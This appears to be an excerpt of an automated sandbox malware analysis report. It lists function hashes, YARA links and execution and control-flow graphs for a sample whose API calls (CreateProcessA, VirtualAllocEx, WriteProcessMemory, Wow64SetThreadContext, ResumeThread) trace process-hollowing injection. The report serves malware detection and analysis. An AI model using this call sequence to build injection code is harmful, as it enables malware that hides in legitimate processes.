                                                  • Opcode ID: 2ed8f8c5032dfee66084d43385c0f0b336455a5b96ba57295740aa8018d06c46
                                                  • Instruction ID: 518b8527a1386d541c7e0f70d21ed979edad39b3d4545997134e207597731dca
                                                  • Opcode Fuzzy Hash: 2ed8f8c5032dfee66084d43385c0f0b336455a5b96ba57295740aa8018d06c46
                                                  • Instruction Fuzzy Hash: AFB12C30F002098FDB58EBB9C5546AEB7E2AF84304F248669E406EB355DF75DC86CB91
                                                  Function 0668EBB0 Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;c<$Dc<$ac<$qc<
                                                  • API String ID: 0-323276557
                                                  • Opcode ID: 4499828439cbd3099087f6de9cc55c43a597a48f9e59ebde647f70c74a09e1d9
                                                  • Instruction ID: 263192845669ad6f5ec8ee37fbf69e7a48b74b24e59f4c257ec3ac09ee0941a7
                                                  • Opcode Fuzzy Hash: 4499828439cbd3099087f6de9cc55c43a597a48f9e59ebde647f70c74a09e1d9
                                                  • Instruction Fuzzy Hash: C9718E31F102058FCB54FBB8D4945ADB7B2EF88214F508A6AE51AEB350EB31DC46CB91
                                                  Function 0668CD30 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR^q$LR^q$$^q$$^q
                                                  • API String ID: 0-2454687669
                                                  • Opcode ID: e2aed2beb6f9aa2a4bff423231ef9aef2aa1ea55590a32ebd38721daffdabf0e
                                                  • Instruction ID: 5699df297185f36a452a92208061b169691a99afa560125017fd01fac647ed26
                                                  • Opcode Fuzzy Hash: e2aed2beb6f9aa2a4bff423231ef9aef2aa1ea55590a32ebd38721daffdabf0e
                                                  • Instruction Fuzzy Hash: 1F61B430B403059FDB58FB78C550A6EB7E2AF88604B108669E406AF3A5DF71DC41C7A1
                                                  Function 0668F592 Relevance: 5.2, Strings: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 254dfd57a48676f00824c3919c1090fd5de03a7254f1ca5dac708cbc0d4dee95
                                                  • Instruction ID: 4acd01fcb67d07471d9f792a576209b725340fd3baaed5be193b98b9a9d706fd
                                                  • Opcode Fuzzy Hash: 254dfd57a48676f00824c3919c1090fd5de03a7254f1ca5dac708cbc0d4dee95
                                                  • Instruction Fuzzy Hash: 96517C30E113059FDBA8FB78E5806AEB3E2EB84250F204629E416EB355DE31EC42CB51
                                                  Function 0668EBA2 Relevance: 5.1, Strings: 4, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;c<$Dc<$ac<$qc<
                                                  • API String ID: 0-323276557
                                                  • Opcode ID: f1ede9d005c6639d2fef791ebafd09a15b066c8f63378568d55e29dee274a2d3
                                                  • Instruction ID: 045cdbbb6258bd2eb39a75e8f98301d91fb7cddbec399d7b6e2990ed0bfed686
                                                  • Opcode Fuzzy Hash: f1ede9d005c6639d2fef791ebafd09a15b066c8f63378568d55e29dee274a2d3
                                                  • Instruction Fuzzy Hash: 51419130A003059FCB54FFB8D4949AEBBF6EF88204B104A69E416E7350DE31DC46CBA1

                                                  Execution Graph

                                                  Execution Coverage:10.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:391
                                                  Total number of Limit Nodes:13
                                                  execution_graph 37880 5737030 37881 573705d 37880->37881 37892 5736cc8 37881->37892 37883 573711a 37884 5736cc8 2 API calls 37883->37884 37885 573714c 37884->37885 37897 5736cd8 37885->37897 37888 5736cd8 2 API calls 37889 57371b0 37888->37889 37901 5736ce8 37889->37901 37891 57371e2 37893 5736cd3 37892->37893 37905 30c5c9c 37893->37905 37910 30c8390 37893->37910 37894 5737e73 37894->37883 37898 5736ce3 37897->37898 37988 5736e64 37898->37988 37900 573717e 37900->37888 37902 5736cf3 37901->37902 37993 573e670 37902->37993 37904 573f857 37904->37891 37907 30c5ca7 37905->37907 37906 30c8691 37906->37894 37907->37906 37915 30ccdf0 37907->37915 37920 30ccde1 37907->37920 37911 30c8393 37910->37911 37912 30c8691 37911->37912 37913 30ccdf0 2 API calls 37911->37913 37914 30ccde1 2 API calls 37911->37914 37912->37894 37913->37912 37914->37912 37916 30cce11 37915->37916 37917 30cce35 37916->37917 37925 30ccf8f 37916->37925 37929 30ccfa0 37916->37929 37917->37906 37922 30ccdf0 37920->37922 37921 30cce35 37921->37906 37922->37921 37923 30ccf8f 2 API calls 37922->37923 37924 30ccfa0 2 API calls 37922->37924 37923->37921 37924->37921 37926 30ccfa0 37925->37926 37927 30ccfe7 37926->37927 37933 30cc8d8 37926->37933 37927->37917 37931 30ccfad 37929->37931 37930 30ccfe7 37930->37917 37931->37930 37932 30cc8d8 2 API calls 37931->37932 37932->37930 37934 30cc8e3 37933->37934 37936 30cd8f8 37934->37936 37937 30cca04 37934->37937 37936->37936 37938 30cca0f 37937->37938 37939 30c5c9c 2 API calls 37938->37939 37940 30cd967 37939->37940 37944 30cf6e0 37940->37944 37950 30cf6c8 37940->37950 37941 30cd9a1 37941->37936 37946 30cf711 37944->37946 37947 30cf811 37944->37947 37945 30cf71d 37945->37941 37946->37945 37956 5730dc8 37946->37956 37962 5730db8 37946->37962 37947->37941 37952 30cf811 37950->37952 37953 30cf711 37950->37953 37951 30cf71d 37951->37941 37952->37941 37953->37951 37954 5730dc8 2 API calls 37953->37954 37955 5730db8 2 API calls 37953->37955 37954->37952 37955->37952 37957 5730df3 37956->37957 37958 5730ea2 37957->37958 37968 5731c70 37957->37968 37977 5731c90 37957->37977 37981 5731ca0 37957->37981 37963 5730dc8 37962->37963 37964 5730ea2 37963->37964 37965 5731c70 2 API calls 37963->37965 37966 5731ca0 CreateWindowExW 37963->37966 37967 5731c90 CreateWindowExW 37963->37967 37965->37964 37966->37964 37967->37964 37969 5731c73 37968->37969 37970 5731c7b 37969->37970 37971 5731cd0 37969->37971 37974 5731ce6 CreateWindowExW 37969->37974 37970->37958 37984 5730aa8 37971->37984 37976 5731e14 37974->37976 37976->37976 37978 5731ca0 37977->37978 37979 5731cd5 37978->37979 37980 5730aa8 CreateWindowExW 37978->37980 37979->37958 37980->37979 37982 5731cd5 37981->37982 37983 5730aa8 CreateWindowExW 37981->37983 37982->37958 37983->37982 37985 5731cf0 CreateWindowExW 37984->37985 37987 5731e14 37985->37987 37989 5736e6f 37988->37989 37990 5738d12 37989->37990 37991 30c5c9c 2 API calls 37989->37991 37992 30c8390 2 API calls 37989->37992 37990->37900 37991->37990 37992->37990 37994 573e67b 37993->37994 37996 30c5c9c 2 API calls 37994->37996 37997 30c8390 2 API calls 37994->37997 37995 573f8dc 37995->37904 37996->37995 37997->37995 37998 148d01c 37999 148d034 37998->37999 38000 148d08e 37999->38000 38007 5732bb3 37999->38007 38016 5731e98 37999->38016 38020 5731ea8 37999->38020 38024 5732c08 37999->38024 38033 5730ad4 37999->38033 38042 5732bb0 37999->38042 38008 5732c24 38007->38008 38009 5732c79 38008->38009 38011 5732c69 38008->38011 38067 5730bfc 38009->38067 38051 5732d91 38011->38051 38056 5732e6c 38011->38056 38062 5732da0 38011->38062 38012 5732c77 38017 5731ece 38016->38017 38018 5730ad4 CallWindowProcW 38017->38018 38019 5731eef 38018->38019 38019->38000 38021 5731ece 38020->38021 38022 5730ad4 CallWindowProcW 38021->38022 38023 5731eef 38022->38023 38023->38000 38025 5732c18 38024->38025 38026 5732c79 38025->38026 38028 5732c69 38025->38028 38027 5730bfc CallWindowProcW 38026->38027 38029 5732c77 38027->38029 38030 5732d91 CallWindowProcW 38028->38030 38031 5732da0 CallWindowProcW 38028->38031 38032 5732e6c CallWindowProcW 38028->38032 38030->38029 38031->38029 38032->38029 38036 5730adf 38033->38036 38034 5732c79 38035 5730bfc CallWindowProcW 38034->38035 38037 5732c77 38035->38037 38036->38034 38038 5732c69 38036->38038 38039 5732d91 CallWindowProcW 38038->38039 38040 5732da0 CallWindowProcW 38038->38040 38041 5732e6c CallWindowProcW 38038->38041 38039->38037 38040->38037 38041->38037 38043 5732c1c 38042->38043 38044 5732c79 38043->38044 38046 5732c69 38043->38046 38045 5730bfc CallWindowProcW 38044->38045 38047 5732c77 38045->38047 38048 5732d91 CallWindowProcW 38046->38048 38049 5732da0 CallWindowProcW 38046->38049 38050 5732e6c CallWindowProcW 38046->38050 38048->38047 38049->38047 38050->38047 38053 5732da0 38051->38053 38052 5732e40 38052->38012 38071 5732e47 38053->38071 38075 5732e58 38053->38075 38057 5732e7a 38056->38057 38058 5732e2a 38056->38058 38060 5732e47 CallWindowProcW 38058->38060 38061 5732e58 CallWindowProcW 38058->38061 38059 5732e40 38059->38012 38060->38059 38061->38059 38064 5732db4 38062->38064 38063 5732e40 38063->38012 38065 5732e47 CallWindowProcW 38064->38065 38066 5732e58 CallWindowProcW 38064->38066 38065->38063 38066->38063 38068 5730c07 38067->38068 38069 573435a CallWindowProcW 38068->38069 38070 5734309 38068->38070 38069->38070 38070->38012 38072 5732e58 38071->38072 38073 5732e69 38072->38073 38078 573429b 38072->38078 38073->38052 38076 5732e69 38075->38076 38077 573429b CallWindowProcW 38075->38077 38076->38052 38077->38076 38079 5730bfc CallWindowProcW 38078->38079 38080 57342aa 38079->38080 38080->38073 38285 30c4668 38286 30c467a 38285->38286 38287 30c4686 38286->38287 38291 30c4779 38286->38291 38296 30c3e1c 38287->38296 38289 30c46a5 38292 30c479d 38291->38292 38300 30c4878 38292->38300 38304 30c4888 38292->38304 38297 30c3e27 38296->38297 38312 30c5c1c 38297->38312 38299 30c6ff0 38299->38289 38301 30c48af 38300->38301 38303 30c498c 38301->38303 38308 30c449c 38301->38308 38306 30c48af 38304->38306 38305 30c498c 38305->38305 38306->38305 38307 30c449c CreateActCtxA 38306->38307 38307->38305 38309 30c5918 CreateActCtxA 38308->38309 38311 30c59db 38309->38311 38313 30c5c27 38312->38313 38316 30c5c3c 38313->38316 38315 30c7095 38315->38299 38317 30c5c47 38316->38317 38320 30c5c6c 38317->38320 38319 30c717a 38319->38315 38321 30c5c77 38320->38321 38322 30c5c9c 2 API calls 38321->38322 38323 30c726d 38322->38323 38323->38319 38324 30cad38 38325 30cad47 38324->38325 38328 30cae30 38324->38328 38336 30cae21 38324->38336 38329 30cae41 38328->38329 38330 30cae64 38328->38330 38329->38330 38344 30cb0b8 38329->38344 38348 30cb0c8 38329->38348 38330->38325 38331 30cae5c 38331->38330 38332 30cb068 GetModuleHandleW 38331->38332 38333 30cb095 38332->38333 38333->38325 38337 30cae41 38336->38337 38338 30cae64 38336->38338 38337->38338 38342 30cb0b8 LoadLibraryExW 38337->38342 38343 30cb0c8 LoadLibraryExW 38337->38343 38338->38325 38339 30cae5c 38339->38338 38340 30cb068 GetModuleHandleW 38339->38340 38341 30cb095 38340->38341 38341->38325 38342->38339 38343->38339 38345 30cb0dc 38344->38345 38346 30cb101 38345->38346 38352 30ca870 38345->38352 38346->38331 38349 30cb0dc 38348->38349 38350 30cb101 38349->38350 38351 30ca870 LoadLibraryExW 38349->38351 38350->38331 38351->38350 38353 30cb2a8 LoadLibraryExW 38352->38353 38355 30cb321 38353->38355 38355->38346 38356 30cd0b8 38357 30cd0fe 38356->38357 38361 30cd298 38357->38361 38364 30cd287 38357->38364 38358 30cd1eb 38362 30cd2c6 38361->38362 38367 30cc9a0 38361->38367 38362->38358 38365 30cc9a0 DuplicateHandle 38364->38365 38366 30cd2c6 38365->38366 38366->38358 38368 30cd300 DuplicateHandle 38367->38368 38369 30cd396 38368->38369 38369->38362 38081 795d000 38082 795d18b 38081->38082 38084 795d026 38081->38084 38084->38082 38085 795b424 38084->38085 38086 795d280 PostMessageW 38085->38086 38087 795d2ec 38086->38087 38087->38084 38370 5738ccb 38371 5738cd0 38370->38371 38372 5736e64 2 API calls 38371->38372 38373 5738cdf 38372->38373 38088 7959d8b 38089 7959af8 38088->38089 38089->38088 38090 7959de6 38089->38090 38093 795bd08 38089->38093 38099 795bcc8 38089->38099 38094 795bd1d 38093->38094 38105 795bd90 38094->38105 38124 795bd48 38094->38124 38142 795bd39 38094->38142 38095 795bd2f 38095->38090 38100 795bd1d 38099->38100 38102 795bd90 12 API calls 38100->38102 38103 795bd39 12 API calls 38100->38103 38104 795bd48 12 API calls 38100->38104 38101 795bd2f 38101->38090 38102->38101 38103->38101 38104->38101 38106 795bd3b 38105->38106 38107 795bd9f 38105->38107 38119 795bd86 38106->38119 38160 795c83d 38106->38160 38165 795c3b2 38106->38165 38171 795c2d0 38106->38171 38176 795c297 38106->38176 38181 795c4d7 38106->38181 38188 795c7a9 38106->38188 38193 795c82f 38106->38193 38198 795c58f 38106->38198 38203 795c3a7 38106->38203 38208 795c1a4 38106->38208 38212 795c304 38106->38212 38218 795c77a 38106->38218 38223 795c55b 38106->38223 38227 795c41e 38106->38227 38232 795c73f 38106->38232 38107->38095 38119->38095 38125 795bd62 38124->38125 38126 795c4d7 4 API calls 38125->38126 38127 795c297 2 API calls 38125->38127 38128 795c2d0 2 API calls 38125->38128 38129 795c3b2 2 API calls 38125->38129 38130 795c83d 2 API calls 38125->38130 38131 795c73f 2 API calls 38125->38131 38132 795c41e 2 API calls 38125->38132 38133 795c55b 2 API calls 38125->38133 38134 795c77a 2 API calls 38125->38134 38135 795c304 2 API calls 38125->38135 38136 795c1a4 2 API calls 38125->38136 38137 795c3a7 2 API calls 38125->38137 38138 795c58f 2 API calls 38125->38138 38139 795c82f 2 API calls 38125->38139 38140 795c7a9 2 API calls 38125->38140 38141 795bd86 38125->38141 38126->38141 38127->38141 38128->38141 38129->38141 38130->38141 38131->38141 38132->38141 38133->38141 38134->38141 38135->38141 38136->38141 38137->38141 38138->38141 38139->38141 38140->38141 38141->38095 38143 795bd48 38142->38143 38144 795c4d7 4 API calls 38143->38144 38145 795c297 2 API calls 38143->38145 38146 795c2d0 2 API calls 38143->38146 38147 795c3b2 2 API calls 38143->38147 38148 795c83d 2 API calls 38143->38148 38149 795c73f 2 API calls 38143->38149 38150 795c41e 2 API calls 38143->38150 38151 795c55b 2 API calls 38143->38151 38152 795c77a 2 API calls 38143->38152 38153 795c304 2 API calls 38143->38153 38154 795c1a4 2 API calls 38143->38154 38155 795bd86 38143->38155 38156 795c3a7 2 API calls 38143->38156 38157 795c58f 2 API calls 38143->38157 38158 795c82f 2 API calls 38143->38158 38159 795c7a9 2 API calls 38143->38159 38144->38155 38145->38155 38146->38155 38147->38155 38148->38155 38149->38155 38150->38155 38151->38155 38152->38155 38153->38155 38154->38155 38155->38095 38156->38155 38157->38155 38158->38155 38159->38155 38161 795c77b 38160->38161 38237 7958990 38161->38237 38241 7958998 38161->38241 38162 795cbd0 38166 795c3bf 38165->38166 38168 795c210 38165->38168 38245 7958a42 38166->38245 38249 7958a48 38166->38249 38167 795cb52 38168->38119 38172 795c394 38171->38172 38253 7959450 38172->38253 38257 7959448 38172->38257 38173 795c5d9 38173->38119 38177 795c2b1 38176->38177 38179 7958990 ResumeThread 38177->38179 38180 7958998 ResumeThread 38177->38180 38178 795cbd0 38179->38178 38180->38178 38184 7958a42 Wow64SetThreadContext 38181->38184 38185 7958a48 Wow64SetThreadContext 38181->38185 38182 795c4f1 38186 7958990 ResumeThread 38182->38186 38187 7958998 ResumeThread 38182->38187 38183 795cbd0 38184->38182 38185->38182 38186->38183 38187->38183 38190 795c41d 38188->38190 38189 795caa7 38189->38119 38190->38189 38191 7959450 WriteProcessMemory 38190->38191 38192 7959448 WriteProcessMemory 38190->38192 38191->38190 38192->38190 38194 795c9a8 38193->38194 38196 7959450 WriteProcessMemory 38194->38196 38197 7959448 WriteProcessMemory 38194->38197 38195 795c60f 38195->38119 38196->38195 38197->38195 38199 795c5b8 38198->38199 38201 7959450 WriteProcessMemory 38199->38201 38202 7959448 WriteProcessMemory 38199->38202 38200 795c5d9 38200->38119 38201->38200 38202->38200 38204 795c662 38203->38204 38261 7959540 38204->38261 38265 7959538 38204->38265 38205 795c684 38269 79596cc 38208->38269 38273 79596d8 38208->38273 38213 795c2c1 38212->38213 38215 795c210 38213->38215 38216 7958990 ResumeThread 38213->38216 38217 7958998 ResumeThread 38213->38217 38214 795cbd0 38215->38119 38216->38214 38217->38214 38219 795c77b 38218->38219 38221 7958990 ResumeThread 38219->38221 38222 7958998 ResumeThread 38219->38222 38220 795cbd0 38221->38220 38222->38220 38277 7959390 38223->38277 38281 7959388 38223->38281 38224 795c579 38228 795c41d 38227->38228 38228->38227 38229 795caa7 38228->38229 38230 7959450 WriteProcessMemory 38228->38230 38231 7959448 WriteProcessMemory 38228->38231 38229->38119 38230->38228 38231->38228 38234 795c296 38232->38234 38233 795cbd0 38235 7958990 ResumeThread 38234->38235 38236 7958998 ResumeThread 38234->38236 38235->38233 38236->38233 38238 79589d8 ResumeThread 38237->38238 38240 7958a09 38238->38240 38240->38162 38242 79589d8 ResumeThread 38241->38242 38244 7958a09 38242->38244 38244->38162 38246 7958a8d Wow64SetThreadContext 38245->38246 38248 7958ad5 38246->38248 38248->38167 38250 7958a8d Wow64SetThreadContext 38249->38250 38252 7958ad5 38250->38252 38252->38167 38254 7959498 WriteProcessMemory 38253->38254 38256 79594ef 38254->38256 38256->38173 38258 7959498 WriteProcessMemory 38257->38258 38260 79594ef 38258->38260 38260->38173 38262 795958b ReadProcessMemory 38261->38262 38264 79595cf 38262->38264 38264->38205 38266 795958b ReadProcessMemory 38265->38266 38268 79595cf 38266->38268 38268->38205 38270 7959761 CreateProcessA 38269->38270 38272 7959923 38270->38272 38274 7959761 CreateProcessA 38273->38274 38276 7959923 38274->38276 38278 79593d0 VirtualAllocEx 38277->38278 38280 795940d 38278->38280 38280->38224 38282 79593d0 VirtualAllocEx 38281->38282 38284 795940d 38282->38284 38284->38224

                                                  Executed Functions

                                                  Function 079596CC Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 374 79596cc-795976d 376 79597a6-79597c6 374->376 377 795976f-7959779 374->377 384 79597ff-795982e 376->384 385 79597c8-79597d2 376->385 377->376 378 795977b-795977d 377->378 379 79597a0-79597a3 378->379 380 795977f-7959789 378->380 379->376 382 795978d-795979c 380->382 383 795978b 380->383 382->382 386 795979e 382->386 383->382 393 7959867-7959921 CreateProcessA 384->393 394 7959830-795983a 384->394 385->384 387 79597d4-79597d6 385->387 386->379 389 79597f9-79597fc 387->389 390 79597d8-79597e2 387->390 389->384 391 79597e4 390->391 392 79597e6-79597f5 390->392 391->392 392->392 395 79597f7 392->395 405 7959923-7959929 393->405 406 795992a-79599b0 393->406 394->393 396 795983c-795983e 394->396 395->389 398 7959861-7959864 396->398 399 7959840-795984a 396->399 398->393 400 795984c 399->400 401 795984e-795985d 399->401 400->401 401->401 403 795985f 401->403 403->398 405->406 416 79599c0-79599c4 406->416 417 79599b2-79599b6 406->417 419 79599d4-79599d8 416->419 420 79599c6-79599ca 416->420 417->416 418 79599b8 417->418 418->416 421 79599e8-79599ec 419->421 422 79599da-79599de 419->422 420->419 423 79599cc 420->423 425 79599fe-7959a05 421->425 426 79599ee-79599f4 421->426 422->421 424 79599e0 422->424 423->419 424->421 427 7959a07-7959a16 425->427 428 7959a1c 425->428 426->425 427->428 430 7959a1d 428->430 430->430
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0795990E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 26d6172f92c0fb4215790fb6e46579c2d928efe3ac0d171d133bce2a99ce3ef5
                                                  • Instruction ID: 1ec7170499e4ea94f8745a41eae52501982e05367e547d6a6f8eb09e9f444ec5
                                                  • Opcode Fuzzy Hash: 26d6172f92c0fb4215790fb6e46579c2d928efe3ac0d171d133bce2a99ce3ef5
                                                  • Instruction Fuzzy Hash: C79150B1D0022ACFEF10CF69C8417DDBBB5BF48314F1485AAD858A7250D775A985CF92
                                                  Function 079596D8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 431 79596d8-795976d 433 79597a6-79597c6 431->433 434 795976f-7959779 431->434 441 79597ff-795982e 433->441 442 79597c8-79597d2 433->442 434->433 435 795977b-795977d 434->435 436 79597a0-79597a3 435->436 437 795977f-7959789 435->437 436->433 439 795978d-795979c 437->439 440 795978b 437->440 439->439 443 795979e 439->443 440->439 450 7959867-7959921 CreateProcessA 441->450 451 7959830-795983a 441->451 442->441 444 79597d4-79597d6 442->444 443->436 446 79597f9-79597fc 444->446 447 79597d8-79597e2 444->447 446->441 448 79597e4 447->448 449 79597e6-79597f5 447->449 448->449 449->449 452 79597f7 449->452 462 7959923-7959929 450->462 463 795992a-79599b0 450->463 451->450 453 795983c-795983e 451->453 452->446 455 7959861-7959864 453->455 456 7959840-795984a 453->456 455->450 457 795984c 456->457 458 795984e-795985d 456->458 457->458 458->458 460 795985f 458->460 460->455 462->463 473 79599c0-79599c4 463->473 474 79599b2-79599b6 463->474 476 79599d4-79599d8 473->476 477 79599c6-79599ca 473->477 474->473 475 79599b8 474->475 475->473 478 79599e8-79599ec 476->478 479 79599da-79599de 476->479 477->476 480 79599cc 477->480 482 79599fe-7959a05 478->482 483 79599ee-79599f4 478->483 479->478 481 79599e0 479->481 480->476 481->478 484 7959a07-7959a16 482->484 485 7959a1c 482->485 483->482 484->485 487 7959a1d 485->487 487->487
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0795990E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: a9c47b4546466ace971c201b9d42aa89206b4c40038cb89ff70134910476e058
                                                  • Instruction ID: 34632258b192d4d668bd5af5adb30fbccb7016a27b6678e8e7b729436ab2feae
                                                  • Opcode Fuzzy Hash: a9c47b4546466ace971c201b9d42aa89206b4c40038cb89ff70134910476e058
                                                  • Instruction Fuzzy Hash: 25915DB1D0022ADFEF10CF69C8417DDBBB6BF48314F1481AAD858A7250DB75A985CF92
                                                  Function 030CAE30 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 30cae30-30cae3f 489 30cae6b-30cae6f 488->489 490 30cae41-30cae4e call 30c9838 488->490 492 30cae71-30cae7b 489->492 493 30cae83-30caec4 489->493 495 30cae64 490->495 496 30cae50 490->496 492->493 499 30caec6-30caece 493->499 500 30caed1-30caedf 493->500 495->489 543 30cae56 call 30cb0b8 496->543 544 30cae56 call 30cb0c8 496->544 499->500 501 30caee1-30caee6 500->501 502 30caf03-30caf05 500->502 504 30caee8-30caeef call 30ca814 501->504 505 30caef1 501->505 506 30caf08-30caf0f 502->506 503 30cae5c-30cae5e 503->495 507 30cafa0-30cb060 503->507 509 30caef3-30caf01 504->509 505->509 510 30caf1c-30caf23 506->510 511 30caf11-30caf19 506->511 538 30cb068-30cb093 GetModuleHandleW 507->538 539 30cb062-30cb065 507->539 509->506 513 30caf25-30caf2d 510->513 514 30caf30-30caf39 call 30ca824 510->514 511->510 513->514 519 30caf3b-30caf43 514->519 520 30caf46-30caf4b 514->520 519->520 521 30caf4d-30caf54 520->521 522 30caf69-30caf6d 520->522 521->522 524 30caf56-30caf66 call 30ca834 call 30ca844 521->524 527 30caf73-30caf76 522->527 524->522 529 30caf78-30caf96 527->529 530 30caf99-30caf9f 527->530 529->530 540 30cb09c-30cb0b0 538->540 541 30cb095-30cb09b 538->541 539->538 541->540 543->503 544->503
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030CB086
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f752132e9f16b6695fb00e1e6a8f6845d1d22c85cecf8ccba346fe20ca87a78a
                                                  • Instruction ID: ce4f7d30ae03941494f29469082755f9fdb6357cebe5deddca354a7132ecf027
                                                  • Opcode Fuzzy Hash: f752132e9f16b6695fb00e1e6a8f6845d1d22c85cecf8ccba346fe20ca87a78a
                                                  • Instruction Fuzzy Hash: 267158B0A11B498FD764DF6AD15079ABBF5FF88300F14896ED086D7A50DB34E84ACB90
                                                  Function 05731C70 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 545 5731c70-5731c78 547 5731ce4 545->547 548 5731c7b-5731c83 545->548 549 5731ce6-5731d56 547->549 550 5731cca-5731cce 547->550 555 5731d61-5731d68 549->555 556 5731d58-5731d5e 549->556 551 5731cd0 call 5730aa8 550->551 552 5731cd8 550->552 557 5731cd5-5731cd6 551->557 552->547 558 5731d73-5731e12 CreateWindowExW 555->558 559 5731d6a-5731d70 555->559 556->555 561 5731e14-5731e1a 558->561 562 5731e1b-5731e53 558->562 559->558 561->562 566 5731e60 562->566 567 5731e55-5731e58 562->567 568 5731e61 566->568 567->566 568->568
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05731E02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 55973d6d2769ec8744fe7212c135a87717e30432dfa96396667e097fad45abec
                                                  • Instruction ID: 93d06f68a3b84b78fc982161a4799e5b2df964346790d53ef47a52089a0cff81
                                                  • Opcode Fuzzy Hash: 55973d6d2769ec8744fe7212c135a87717e30432dfa96396667e097fad45abec
                                                  • Instruction Fuzzy Hash: 225103B1D003089FDB14CFAAC885ADEBFB5FF48310F64816AE419AB221D7719845DF90
                                                  Function 05730AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 569 5730aa8-5731d56 571 5731d61-5731d68 569->571 572 5731d58-5731d5e 569->572 573 5731d73-5731e12 CreateWindowExW 571->573 574 5731d6a-5731d70 571->574 572->571 576 5731e14-5731e1a 573->576 577 5731e1b-5731e53 573->577 574->573 576->577 581 5731e60 577->581 582 5731e55-5731e58 577->582 583 5731e61 581->583 582->581 583->583
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05731E02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 7884951b0d1b2be8739fae1f9f29405e0bb895d056330c839e7dbf2b11d93a98
                                                  • Instruction ID: a684d0b3ae1cfad437c13fa5932767a2aee0647dd8962109610e91530d8f2375
